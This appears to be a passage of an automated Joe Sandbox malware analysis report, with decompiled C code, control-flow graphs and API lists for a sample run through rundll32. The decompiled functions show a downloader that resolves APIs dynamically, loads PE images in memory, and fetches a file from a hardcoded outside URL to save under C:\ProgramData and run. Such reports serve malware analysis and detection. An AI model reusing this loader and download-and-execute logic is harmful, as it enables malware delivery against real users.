call 11816c0 161->163 171 1181372 162->171 172 1181377-1181388 162->172 163->120 171->163 173 118138a-11813a0 call 1182090 172->173 174 11813a2-11813a5 172->174 176 11813ac-11813ba call 11821a0 173->176 174->176 180 11813bc 176->180 181 11813c1-11813cf call 1181e80 176->181 180->163 184 11813d1 181->184 185 11813d6-11813e4 call 1182010 181->185 184->163 188 11813eb-11813f4 185->188 189 11813e6 185->189 190 1181470-1181473 188->190 191 11813f6-11813fd 188->191 189->163 194 118147a-118147d 190->194 192 118145d-118146b 191->192 193 11813ff-118144e GetPEB call 1191000 191->193 195 118146e 192->195 196 1181451-118145b 193->196 194->120 195->194 196->195
    APIs
    • LoadLibraryW.KERNEL32(01184054,01184040), ref: 01181047
    • GetProcAddress.KERNEL32(00000000), ref: 0118104E
      • Part of subcall function 01181B30: SetLastError.KERNEL32(0000000D,?,01181070,?,00000040), ref: 01181B3D
    • SetLastError.KERNEL32(000000C1), ref: 01181096
    Memory Dump Source
    • Source File: 0000000A.00000002.703390841.0000000001181000.00000020.00000001.sdmp, Offset: 01181000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1181000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast$AddressLibraryLoadProc
    • String ID:
    • API String ID: 1866314245-0
    • Opcode ID: bc7fecdde333443b587c1bc15acf54aaa0c8361fd18ddd9da41475fe1ac0b0b6
    • Instruction ID: e5b58642e1bfa95848f5ec43f5a5df693ed3134dc2ffa1a10c09974a08779cbb
    • Opcode Fuzzy Hash: bc7fecdde333443b587c1bc15acf54aaa0c8361fd18ddd9da41475fe1ac0b0b6
    • Instruction Fuzzy Hash: 0AF1D9B5A00209EFDB08DF98D994AAEB7B1FF48304F208558E915AB341D775EE42CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011B11A0, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 69libraryloaderCOMMON
    Download Yara Rule

    Control-flow Graph

    C-Code - Quality: 100%
    			E011B11A0() {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _v12;
				void* _t32;
				void* _t40;

				_v8 = LoadLibraryA("msvcrt.dll");
				_v12 = LoadLibraryA("kernel32.dll");
				 *0x11b3010 = GetProcAddress(_v8, "realloc");
				 *0x11b3020 = GetProcAddress(_v8, "exit");
				 *0x11b3024 = GetProcAddress(_v8, "strncmp");
				 *0x11b3008 = GetProcAddress(_v8, "free");
				 *0x11b300c = GetProcAddress(_v8, "malloc");
				 *0x11b3014 = GetProcAddress(_v12, "CreateDirectoryA");
				 *0x11b3018 = GetProcAddress(_v12, "CreateProcessA");
				 *0x11b301c = GetProcAddress(_v12, "DeleteFileA");
				 *0x11b3028 = GetProcAddress(_v8, "memset");
				 *0x11b3030 = GetProcAddress(_v8, "memcpy");
				 *0x11b302c = GetProcAddress(_v8, "strstr"); // executed
				E011B1040(); // executed
				_t32 = E011B10B0(_t40); // executed
				return _t32;
			}







    0x011b11b1
    0x011b11bf
    0x011b11d1
    0x011b11e5
    0x011b11f9
    0x011b120d
    0x011b1221
    0x011b1235
    0x011b1249
    0x011b125d
    0x011b1271
    0x011b1285
    0x011b1299
    0x011b129e
    0x011b12a3
    0x011b12ab

    APIs
    • LoadLibraryA.KERNEL32(msvcrt.dll), ref: 011B11AB
    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 011B11B9
    • GetProcAddress.KERNEL32(00000001,realloc), ref: 011B11CB
    • GetProcAddress.KERNEL32(00000001,exit), ref: 011B11DF
    • GetProcAddress.KERNEL32(00000001,strncmp), ref: 011B11F3
    • GetProcAddress.KERNEL32(00000001,free), ref: 011B1207
    • GetProcAddress.KERNEL32(00000001,malloc), ref: 011B121B
    • GetProcAddress.KERNEL32(?,CreateDirectoryA), ref: 011B122F
    • GetProcAddress.KERNEL32(?,CreateProcessA), ref: 011B1243
    • GetProcAddress.KERNEL32(?,DeleteFileA), ref: 011B1257
    • GetProcAddress.KERNEL32(00000001,memset), ref: 011B126B
    • GetProcAddress.KERNEL32(00000001,memcpy), ref: 011B127F
    • GetProcAddress.KERNEL32(00000001,strstr), ref: 011B1293
      • Part of subcall function 011B1040: CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,011B12A3), ref: 011B108A
      • Part of subcall function 011B10B0: Sleep.KERNEL32(00003A98), ref: 011B1166
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.703509486.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 0000000A.00000002.703497080.00000000011B0000.00000004.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703520436.00000000011B2000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad$CreateDirectorySleep
    • String ID: CreateDirectoryA$CreateProcessA$DeleteFileA$exit$free$kernel32.dll$malloc$memcpy$memset$msvcrt.dll$realloc$strncmp$strstr
    • API String ID: 2158191583-3107153655
    • Opcode ID: e1c7a0048707f8ab3940969266d7ec65be425d58be735c8baeec0068421cb345
    • Instruction ID: cac8be6125ccedb07fccc3ab99c45f468b5b45ec2eeacaec7818c7329323f8e4
    • Opcode Fuzzy Hash: e1c7a0048707f8ab3940969266d7ec65be425d58be735c8baeec0068421cb345
    • Instruction Fuzzy Hash: 8621D4B8950304FFC73CDFA2D9C99AD7B76FB486017100969FD3196204D7746998EB60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01191B50, Relevance: 22.8, APIs: 15, Instructions: 331COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 5 1191b50-1191b77 call 1191270 8 1191b79-1191b7b 5->8 9 1191b80-1191b91 5->9 10 1191f6a-1191f6d 8->10 11 1191b93-1191ba0 SetLastError 9->11 12 1191ba5-1191bc0 call 1191270 9->12 11->10 15 1191bc9-1191bde 12->15 16 1191bc2-1191bc4 12->16 17 1191be0-1191bed SetLastError 15->17 18 1191bf2-1191bff 15->18 16->10 17->10 19 1191c01-1191c0e SetLastError 18->19 20 1191c13-1191c1c 18->20 19->10 21 1191c1e-1191c2b SetLastError 20->21 22 1191c30-1191c51 20->22 21->10 23 1191c65-1191c6f 22->23 24 1191c71-1191c78 23->24 25 1191ca7-1191ce2 GetNativeSystemInfo 23->25 26 1191c88-1191c94 24->26 27 1191c7a-1191c86 24->27 28 1191ce4-1191cf1 SetLastError 25->28 29 1191cf6-1191d15 VirtualAlloc 25->29 30 1191c97-1191c9d 26->30 27->30 28->10 31 1191d42-1191d5a GetProcessHeap HeapAlloc 29->31 32 1191d17-1191d31 VirtualAlloc 29->32 33 1191c9f-1191ca2 30->33 34 1191ca5 30->34 36 1191d7c-1191d92 31->36 37 1191d5c-1191d77 VirtualFree SetLastError 31->37 32->31 35 1191d33-1191d3d SetLastError 32->35 33->34 34->23 35->10 38 1191d9d 36->38 39 1191d94-1191d9b 36->39 37->10 41 1191da4-1191def call 1191270 38->41 39->41 44 1191dfb-1191e60 VirtualAlloc call 11910d0 call 11912a0 41->44 45 1191df1 41->45 53 1191e6c-1191e7d 44->53 54 1191e62 44->54 46 1191f5c-1191f68 call 1192120 45->46 46->10 55 1191e7f-1191e95 call 11917b0 53->55 56 1191e97-1191e9a 53->56 54->46 57 1191ea1-1191eaf call 11918c0 55->57 56->57 62 1191ebb-1191ec9 call 11915b0 57->62 63 1191eb1 57->63 66 1191ecb 62->66 67 1191ed5-1191ee3 call 1191730 62->67 63->46 66->46 70 1191ee9-1191ef2 67->70 71 1191ee5 67->71 72 1191f4d-1191f50 70->72 73 1191ef4-1191efb 70->73 71->46 74 1191f57-1191f5a 72->74 75 1191f3a-1191f48 73->75 76 1191efd-1191f13 call 11b1010 73->76 74->10 74->46 77 1191f4b 75->77 78 1191f16-1191f1d 76->78 77->74 79 1191f1f-1191f2a SetLastError 78->79 80 1191f2e-1191f38 78->80 79->46 80->77
    C-Code - Quality: 90%
    			E01191B50(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				intOrPtr* _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed short* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				long _v44;
				void* _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v100;
				char _v104;
				void* _t184;
				void* _t195;
				void* _t202;
				void* _t205;
				void* _t206;
				void* _t223;
				intOrPtr _t320;

				_v20 = __ecx;
				_v8 = 0;
				_v40 = 0;
				if(E01191270(_v20, _a8, 0x40) != 0) {
					_v28 = _a4;
					if(( *_v28 & 0x0000ffff) == 0x5a4d) {
						if(E01191270(_v20, _a8, _v28[0x1e] + 0xf8) != 0) {
							_v12 = _a4 + _v28[0x1e];
							if( *_v12 == 0x4550) {
								_t19 = _v12 + 4; // 0x3
								if(( *_t19 & 0x0000ffff) == 0x14c) {
									_t21 = _v12 + 0x38; // 0x0
									if(( *_t21 & 0x00000001) == 0) {
										_t23 = _v12 + 0x14; // 0x0
										_t26 = ( *_t23 & 0x0000ffff) + 0x18; // 0x1194018
										_v24 = _v12 + _t26;
										_t29 = _v12 + 0x38; // 0x0
										_v60 =  *_t29;
										_v32 = 0;
										while(1) {
											_t37 = _v12 + 6; // 0x40000
											if(_v32 >= ( *_t37 & 0x0000ffff)) {
												break;
											}
											if( *((intOrPtr*)(_v24 + 0x10)) != 0) {
												_v36 =  *((intOrPtr*)(_v24 + 0xc)) +  *((intOrPtr*)(_v24 + 0x10));
											} else {
												_v36 =  *((intOrPtr*)(_v24 + 0xc)) + _v60;
											}
											if(_v36 > _v40) {
												_v40 = _v36;
											}
											_v32 = _v32 + 1;
											_v24 = _v24 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v104); // executed
										_t56 = _v12 + 0x50; // 0x70207369
										_t59 = _v100 - 1; // 0x70207368
										_v44 =  *_t56 + _t59 &  !(_v100 - 1);
										_t65 = _v100 - 1; // -1
										if(_v44 == (_v40 + _t65 &  !(_v100 - 1))) {
											_t70 = _v12 + 0x34; // 0x0
											_t184 = VirtualAlloc( *_t70, _v44, 0x3000, 4); // executed
											_v16 = _t184;
											if(_v16 != 0) {
												L26:
												_v8 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v8 != 0) {
													 *((intOrPtr*)(_v8 + 4)) = _v16;
													_t83 = _v12 + 0x16; // 0x400000
													if(( *_t83 & 0x2000) == 0) {
														_v48 = 0;
													} else {
														_v48 = 1;
													}
													 *(_v8 + 0x14) = _v48;
													 *((intOrPtr*)(_v8 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v8 + 0x20)) = _a16;
													 *((intOrPtr*)(_v8 + 0x24)) = _a20;
													 *((intOrPtr*)(_v8 + 0x28)) = _a24;
													 *((intOrPtr*)(_v8 + 0x30)) = _v100;
													_t105 = _v12 + 0x54; // 0x72676f72
													if(E01191270(_v20, _a8,  *_t105) != 0) {
														_t109 = _v12 + 0x54; // 0x72676f72
														_t195 = VirtualAlloc(_v16,  *_t109, 0x1000, 4); // executed
														_v52 = _t195;
														_t113 = _v12 + 0x54; // 0x72676f72
														E011910D0(_v52, _v28,  *_t113);
														 *_v8 = _v52 + _v28[0x1e];
														 *((intOrPtr*)( *_v8 + 0x34)) = _v16;
														_t202 = E011912A0(_v20, _a4, _a8, _v12, _v8); // executed
														if(_t202 != 0) {
															_t131 = _v12 + 0x34; // 0x0
															_t320 =  *((intOrPtr*)( *_v8 + 0x34)) -  *_t131;
															_v56 = _t320;
															if(_t320 == 0) {
																 *((intOrPtr*)(_v8 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v8 + 0x18)) = E011917B0(_v20, _v8, _v56);
															}
															_t205 = E011918C0(_v20, _v8); // executed
															if(_t205 != 0) {
																_t206 = E011915B0(_v20, _v8); // executed
																if(_t206 != 0) {
																	if(E01191730(_v20, _v8) != 0) {
																		if( *((intOrPtr*)( *_v8 + 0x28)) == 0) {
																			 *(_v8 + 0x2c) = 0;
																			L52:
																			return _v8;
																		}
																		if( *(_v8 + 0x14) == 0) {
																			 *(_v8 + 0x2c) = _v16 +  *((intOrPtr*)( *_v8 + 0x28));
																			L50:
																			goto L52;
																		}
																		_v64 = _v16 +  *((intOrPtr*)( *_v8 + 0x28));
																		_v68 = _v64(_v16, 1, 0);
																		if(_v68 != 0) {
																			 *((intOrPtr*)(_v8 + 0x10)) = 1;
																			goto L50;
																		}
																		SetLastError(0x45a);
																		goto L53;
																	}
																	goto L53;
																}
																goto L53;
															}
															goto L53;
														}
														goto L53;
													} else {
														L53:
														E01192120(_v20, _v8);
														return 0;
													}
												}
												VirtualFree(_v16, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t223 = VirtualAlloc(0, _v44, 0x3000, 4); // executed
											_v16 = _t223;
											if(_v16 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}




























    0x01191b56
    0x01191b59
    0x01191b60
    0x01191b77
    0x01191b83
    0x01191b91
    0x01191bc0
    0x01191bd2
    0x01191bde
    0x01191bf5
    0x01191bff
    0x01191c16
    0x01191c1c
    0x01191c33
    0x01191c3a
    0x01191c3e
    0x01191c44
    0x01191c47
    0x01191c4a
    0x01191c65
    0x01191c68
    0x01191c6f
    0x00000000
    0x00000000
    0x01191c78
    0x01191c94
    0x01191c7a
    0x01191c83
    0x01191c83
    0x01191c9d
    0x01191ca2
    0x01191ca2
    0x01191c59
    0x01191c62
    0x01191c62
    0x01191cab
    0x01191cb4
    0x01191cba
    0x01191cc8
    0x01191cd1
    0x01191ce2
    0x01191d04
    0x01191d08
    0x01191d0e
    0x01191d15
    0x01191d42
    0x01191d53
    0x01191d5a
    0x01191d82
    0x01191d88
    0x01191d92
    0x01191d9d
    0x01191d94
    0x01191d94
    0x01191d94
    0x01191daa
    0x01191db3
    0x01191dbc
    0x01191dc5
    0x01191dce
    0x01191dd7
    0x01191ddd
    0x01191def
    0x01191e05
    0x01191e0d
    0x01191e13
    0x01191e19
    0x01191e25
    0x01191e39
    0x01191e43
    0x01191e59
    0x01191e60
    0x01191e77
    0x01191e77
    0x01191e7a
    0x01191e7d
    0x01191e9a
    0x01191e7f
    0x01191e92
    0x01191e92
    0x01191ea8
    0x01191eaf
    0x01191ec2
    0x01191ec9
    0x01191ee3
    0x01191ef2
    0x01191f50
    0x01191f57
    0x00000000
    0x01191f57
    0x01191efb
    0x01191f48
    0x01191f4b
    0x00000000
    0x01191f4b
    0x01191f08
    0x01191f16
    0x01191f1d
    0x01191f31
    0x00000000
    0x01191f31
    0x01191f24
    0x00000000
    0x01191f24
    0x00000000
    0x01191ee5
    0x00000000
    0x01191ecb
    0x00000000
    0x01191eb1
    0x00000000
    0x01191df1
    0x01191f5c
    0x01191f63
    0x00000000
    0x01191f68
    0x01191def
    0x01191d67
    0x01191d6f
    0x00000000
    0x01191d75
    0x01191d24
    0x01191d2a
    0x01191d31
    0x00000000
    0x00000000
    0x01191d35
    0x00000000
    0x01191d3b
    0x01191ce9
    0x00000000
    0x01191cef
    0x01191c23
    0x00000000
    0x01191c29
    0x01191c06
    0x00000000
    0x01191c0c
    0x01191be5
    0x00000000
    0x01191beb
    0x00000000
    0x01191bc2
    0x01191b98
    0x00000000
    0x01191b9e
    0x00000000

    APIs
      • Part of subcall function 01191270: SetLastError.KERNEL32(0000000D,?,?,01191B75,01191025,00000040), ref: 01191281
    • SetLastError.KERNEL32(000000C1,01191025,00000040), ref: 01191B98
    Memory Dump Source
    • Source File: 0000000A.00000002.703440159.0000000001191000.00000020.00000001.sdmp, Offset: 01190000, based on PE: true
    • Associated: 0000000A.00000002.703430993.0000000001190000.00000004.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703449710.0000000001193000.00000002.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703458852.0000000001194000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1190000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 524930e88772bca516f55fe9e8622fc53fafd7190fcb2e9cc98900534de40662
    • Instruction ID: de7cb11d777dd453fb26621f2c0dad7f7d74016afb0a7fba33915e5df6c014b4
    • Opcode Fuzzy Hash: 524930e88772bca516f55fe9e8622fc53fafd7190fcb2e9cc98900534de40662
    • Instruction Fuzzy Hash: BFE1EE74A1020AEFDF08DFA4C994AAEBBB1FF48314F108558E525AB385D730AE85CF55
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011B1640, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 212networkCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • wsprintfA.USER32 ref: 011B173A
    • WSAStartup.WS2_32(00000102,?), ref: 011B174F
    • socket.WS2_32(00000002,00000001,00000006), ref: 011B1766
    • gethostbyname.WS2_32(?), ref: 011B1779
    • htons.WS2_32(?), ref: 011B178D
    • connect.WS2_32(?,?,00000010), ref: 011B17D2
    • send.WS2_32(?,?,?,00000000), ref: 011B1854
    • recv.WS2_32(?,?,00000BB8,00000000), ref: 011B18C1
    Strings
    • ping, xrefs: 011B1657
    • POST %s HTTP/1.1Host: %sPragma: no-cacheContent-Length: %d%s, xrefs: 011B172E
    Memory Dump Source
    • Source File: 0000000A.00000002.703509486.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 0000000A.00000002.703497080.00000000011B0000.00000004.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703520436.00000000011B2000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: Startupconnectgethostbynamehtonsrecvsendsocketwsprintf
    • String ID: POST %s HTTP/1.1Host: %sPragma: no-cacheContent-Length: %d%s$ping
    • API String ID: 1466141387-1232505173
    • Opcode ID: f6978137ba71fcb6e0da756795d20d2b10f24d0e6a1d592e9d42bb51408db726
    • Instruction ID: b02902954f8f0a7703db2175f940490ff7f40911fcc298cdf02437931d0d9165
    • Opcode Fuzzy Hash: f6978137ba71fcb6e0da756795d20d2b10f24d0e6a1d592e9d42bb51408db726
    • Instruction Fuzzy Hash: 79B10374D082A89FDB28CF64DD94BD9B7B5AF48300F0085D9E68DA7285D7B06AC8CF51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011821A0, Relevance: 6.2, APIs: 4, Instructions: 182COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 201 11821a0-11821d1 202 11821dd-1182201 IsBadHugeReadPtr 201->202 203 11821d3-11821d8 201->203 206 11823c0 202->206 207 1182207-118220e 202->207 204 11823c3-11823c6 203->204 206->204 207->206 208 1182214-1182237 207->208 210 1182239-1182248 SetLastError 208->210 211 118224d-1182262 call 1181a20 208->211 210->206 213 1182267-1182271 211->213 214 118229d-11822cd 213->214 215 1182273-1182298 SetLastError 213->215 216 11822e8-11822fd 214->216 217 11822cf-11822e6 214->217 215->206 219 1182300 216->219 217->219 220 1182314-118231a 219->220 221 118231c-1182327 220->221 222 1182395-1182399 220->222 225 1182329-1182350 221->225 226 1182352-118237d 221->226 223 11823bb 222->223 224 118239b-11823b9 SetLastError 222->224 223->206 224->206 230 118237f-1182385 225->230 226->230 231 1182390 230->231 232 1182387-118238e 230->232 231->220 232->222
    APIs
    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 011821F9
    • SetLastError.KERNEL32(0000007E), ref: 0118223B
    Memory Dump Source
    • Source File: 0000000A.00000002.703390841.0000000001181000.00000020.00000001.sdmp, Offset: 01181000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1181000_rundll32.jbxd
    Similarity
    • API ID: ErrorHugeLastRead
    • String ID:
    • API String ID: 3239643929-0
    • Opcode ID: 3d9eb0e4d81e695243eb890cee7e7cf0c121773a10a378cb9c59f46761b20239
    • Instruction ID: cc5976c75837d3f6cdea84f5ce0ddfe4a88b23af19b9841eb8a16dd7ade0563f
    • Opcode Fuzzy Hash: 3d9eb0e4d81e695243eb890cee7e7cf0c121773a10a378cb9c59f46761b20239
    • Instruction Fuzzy Hash: 3F81AA74A04209EFDB09DF98C894AADBBB1FF48314F24C158E919AB355D734EA81CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011918C0, Relevance: 5.2, APIs: 4, Instructions: 183COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 234 11918c0-11918f4 235 1191900-1191924 IsBadReadPtr 234->235 236 11918f6-11918fb 234->236 239 119192a-1191931 235->239 240 1191ae3 235->240 237 1191ae6-1191ae9 236->237 239->240 241 1191937-119195a call 1191af0 239->241 240->237 243 119195c-119196b SetLastError 241->243 244 1191970-1191985 call 1191170 241->244 243->240 246 119198a-1191994 244->246 247 11919c0-11919f0 246->247 248 1191996-11919bb SetLastError 246->248 249 1191a0b-1191a20 247->249 250 11919f2-1191a09 247->250 248->240 251 1191a23 249->251 250->251 253 1191a37-1191a3d 251->253 254 1191ab8-1191abc 253->254 255 1191a3f-1191a4a 253->255 256 1191ade 254->256 257 1191abe-1191adc SetLastError 254->257 258 1191a4c-1191a73 255->258 259 1191a75-1191aa0 255->259 256->240 257->240 263 1191aa2-1191aa8 258->263 259->263 264 1191aaa-1191ab1 263->264 265 1191ab3 263->265 264->254 265->253
    C-Code - Quality: 37%
    			E011918C0(intOrPtr __ecx, intOrPtr* _a4) {
				void* _v8;
				signed int* _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t114;
				intOrPtr _t117;
				intOrPtr _t135;
				intOrPtr _t140;
				void* _t206;
				void* _t207;

				_v44 = __ecx;
				_t3 = _a4 + 4; // 0x3
				_v16 =  *_t3;
				_v28 = 1;
				_v32 =  *_a4 + 0xbadc25;
				if( *((intOrPtr*)(_v32 + 4)) != 0) {
					_v8 = _v16 +  *_v32;
					while(IsBadReadPtr(_v8, 0x14) == 0 &&  *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t21 = _a4 + 0x28; // 0x0
						_t26 = _a4 + 0x1c; // 0x0, executed
						_t114 =  *((intOrPtr*)( *_t26))(_v16 +  *((intOrPtr*)(_v8 + 0xc)),  *_t21); // executed
						_t207 = _t206 + 8;
						_v24 = _t114;
						if(_v24 != 0) {
							_t31 = _a4 + 0xc; // 0xffff
							_t35 = _a4 + 8; // 0x4
							_t117 = E01191170( *_t35, 4 +  *_t31 * 4); // executed
							_t206 = _t207 + 8;
							_v36 = _t117;
							if(_v36 != 0) {
								 *((intOrPtr*)(_a4 + 8)) = _v36;
								_t48 = _a4 + 0xc; // 0xffff
								_t50 = _a4 + 8; // 0x4
								 *((intOrPtr*)( *_t50 +  *_t48 * 4)) = _v24;
								_t55 = _a4 + 0xc; // 0xffff
								 *(_a4 + 0xc) =  *_t55 + 1;
								if( *_v8 == 0) {
									_v12 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
									_v20 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
								} else {
									_v12 = _v16 +  *_v8;
									_v20 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while( *_v12 != 0) {
									if(( *_v12 & 0x80000000) == 0) {
										_v40 = _v16 +  *_v12;
										_t91 = _a4 + 0x28; // 0x0
										_t95 = _a4 + 0x20; // 0x0
										_t135 =  *((intOrPtr*)( *_t95))(_v24, _v40 + 2,  *_t91);
										_t206 = _t206 + 0xc;
										 *_v20 = _t135;
									} else {
										_t81 = _a4 + 0x28; // 0x0
										_t85 = _a4 + 0x20; // 0x0
										_t140 =  *((intOrPtr*)( *_t85))(_v24,  *_v12 & 0x0000ffff,  *_t81);
										_t206 = _t206 + 0xc;
										 *_v20 = _t140;
									}
									if( *_v20 != 0) {
										_v12 =  &(_v12[1]);
										_v20 = _v20 + 4;
										continue;
									} else {
										_v28 = 0;
										break;
									}
								}
								if(_v28 != 0) {
									_v8 = _v8 + 0x14;
									continue;
								}
								_t101 = _a4 + 0x28; // 0x0
								_t104 = _a4 + 0x24; // 0x0
								 *((intOrPtr*)( *_t104))(_v24,  *_t101);
								SetLastError(0x7f);
								break;
							}
							_t39 = _a4 + 0x28; // 0x0
							_t42 = _a4 + 0x24; // 0x0
							 *((intOrPtr*)( *_t42))(_v24,  *_t39);
							SetLastError(0xe);
							_v28 = 0;
							break;
						}
						SetLastError(0x7e);
						_v28 = 0;
						break;
					}
					return _v28;
				}
				return 1;
			}



















    0x011918c6
    0x011918cc
    0x011918cf
    0x011918d2
    0x011918ea
    0x011918f4
    0x01191908
    0x01191916
    0x0119193a
    0x0119194b
    0x0119194e
    0x01191950
    0x01191953
    0x0119195a
    0x01191973
    0x01191981
    0x01191985
    0x0119198a
    0x0119198d
    0x01191994
    0x011919c6
    0x011919cc
    0x011919d2
    0x011919d8
    0x011919de
    0x011919e7
    0x011919f0
    0x01191a14
    0x01191a20
    0x011919f2
    0x011919fa
    0x01191a06
    0x01191a06
    0x01191a37
    0x01191a4a
    0x01191a7d
    0x01191a83
    0x01191a95
    0x01191a98
    0x01191a9a
    0x01191aa0
    0x01191a4c
    0x01191a4f
    0x01191a66
    0x01191a69
    0x01191a6b
    0x01191a71
    0x01191a71
    0x01191aa8
    0x01191a2b
    0x01191a34
    0x00000000
    0x01191aaa
    0x01191aaa
    0x00000000
    0x01191aaa
    0x01191aa8
    0x01191abc
    0x01191913
    0x00000000
    0x01191913
    0x01191ac1
    0x01191acc
    0x01191acf
    0x01191ad6
    0x00000000
    0x01191ad6
    0x01191999
    0x011919a4
    0x011919a7
    0x011919ae
    0x011919b4
    0x00000000
    0x011919b4
    0x0119195e
    0x01191964
    0x00000000
    0x01191964
    0x00000000
    0x01191ae3
    0x00000000

    APIs
    • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 0119191C
    • SetLastError.KERNEL32(0000007E), ref: 0119195E
    Memory Dump Source
    • Source File: 0000000A.00000002.703440159.0000000001191000.00000020.00000001.sdmp, Offset: 01190000, based on PE: true
    • Associated: 0000000A.00000002.703430993.0000000001190000.00000004.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703449710.0000000001193000.00000002.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703458852.0000000001194000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1190000_rundll32.jbxd
    Similarity
    • API ID: ErrorLastRead
    • String ID:
    • API String ID: 4100373531-0
    • Opcode ID: 3a3e4703c0d9aa02f2546af26afa45898850dd98e0b19a27ca1735b162736dce
    • Instruction ID: 44b99df1bf7e286b473ec26535e2231c30da42c8fba062804f9137289d70601e
    • Opcode Fuzzy Hash: 3a3e4703c0d9aa02f2546af26afa45898850dd98e0b19a27ca1735b162736dce
    • Instruction Fuzzy Hash: F3819974A00209EFDB08CF98C584AAEBBB1FF48364F148158E959AB355D774AE81CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011B10B0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 268 11b10b0-11b10ed call 11b1640 270 11b10f2-11b110a 268->270 271 11b110c-11b1121 270->271 272 11b1124-11b114b call 11b1640 270->272 271->272 276 11b114d-11b116c call 11b1350 Sleep call 11b12b0 272->276 277 11b1171-11b119a call 11b1a04 272->277 276->277
    C-Code - Quality: 49%
    			E011B10B0(void* __eflags) {
				signed int _v8;
				void _v36;
				void _v68;
				signed char* _v72;
				signed char* _v76;
				char _v80;
				char _v84;
				signed char* _t28;
				signed char* _t30;
				void* _t34;
				signed char* _t46;
				signed int _t71;
				void* _t72;
				void* _t75;
				void* _t76;
				void* _t80;

				_t80 = __eflags;
				_v8 =  *0x11b3004 ^ _t71;
				memcpy( &_v36, "http://veso2.xyz/campo/r/r1", 7 << 2);
				memcpy( &_v68, "C:\\ProgramData\\huqvg\\huqvg.exe", 7 << 2);
				asm("movsw");
				asm("movsb");
				_t28 = E011B1640(_t80,  &_v36,  &_v84, 1); // executed
				_t75 = _t72 + 0x24;
				_v72 = _t28;
				_t46 = _v72;
				_t81 = ( *_t46 & 0x000000ff) - 0x68;
				if(( *_t46 & 0x000000ff) != 0x68) {
					 *0x11b3008(_v72);
					 *0x11b3020(1);
					_t75 = _t75 + 8;
				}
				_t30 = E011B1640(_t81, _v72,  &_v80, 1);
				_t76 = _t75 + 0xc;
				_v76 = _t30;
				if(( *_v76 & 0x000000ff) == 0x4d) {
					E011B1350(_v76, _v80,  &_v68);
					_t76 = _t76 + 0xc;
					Sleep(0x3a98);
					E011B12B0();
				}
				 *0x11b3008(_v76);
				_t34 =  *0x11b3008(_v72);
				E011B1A04();
				return _t34;
			}



















    0x011b10b0
    0x011b10bd
    0x011b10cf
    0x011b10de
    0x011b10e0
    0x011b10e2
    0x011b10ed
    0x011b10f2
    0x011b10f5
    0x011b1100
    0x011b1107
    0x011b110a
    0x011b1110
    0x011b111b
    0x011b1121
    0x011b1121
    0x011b112e
    0x011b1133
    0x011b1136
    0x011b114b
    0x011b1159
